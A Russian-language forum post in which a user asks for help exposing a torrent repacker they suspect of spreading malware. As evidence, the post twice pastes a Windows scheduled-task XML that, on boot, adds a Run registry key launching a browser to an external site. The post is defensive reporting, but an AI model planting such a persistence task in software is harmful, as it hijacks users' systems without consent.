[more] Здравствуйте, помогите пожалуйста вывести на чистую воду распространителя вирусов. Есть в сети один популярный торрент-трекер, на нем один чувак выкладывает свои репаки, в которых прописывает в автозагрузку вредоносный код. Модеры не хотят его забанить, так-как нету прямых доказательств, что его репаки зараженные. Когда я установил репак первый раз, то появился C:/Windows/System32/Tasks/файл, где вот такое прописано:
Код: <?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2015-10-10T00:00:00.0000000</Date>
<Author>FARAON-PC\FaRaOn</Author>
<Description>FaRaOn</Description>
</RegistrationInfo>
<Triggers>
<BootTrigger>
<StartBoundary>2016-08-16T00:00:00</StartBoundary>
<Enabled>true</Enabled>
<Delay>PT15M</Delay>
</BootTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId>FARAON-PC\FaRaOn</UserId>
<LogonType>InteractiveToken</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v FaRaOn /t REG_SZ /d "explorer.exe http://sd-steam.info"</Arguments>
</Exec>
</Actions>
</Task>
Код: <?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2015-10-10T00:00:00.0000000</Date>
<Author>FARAON-PC\FaRaOn</Author>
<Description>FaRaOn</Description>
</RegistrationInfo>
<Triggers>
<BootTrigger>
<StartBoundary>2016-08-16T00:00:00</StartBoundary>
<Enabled>true</Enabled>
<Delay>PT15M</Delay>
</BootTrigger>
</Triggers>
<Principals>
<Principal id="Author">
<UserId>FARAON-PC\FaRaOn</UserId>
<LogonType>InteractiveToken</LogonType>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v FaRaOn /t REG_SZ /d "explorer.exe http://sd-steam.info"</Arguments>
</Exec>
</Actions>
</Task>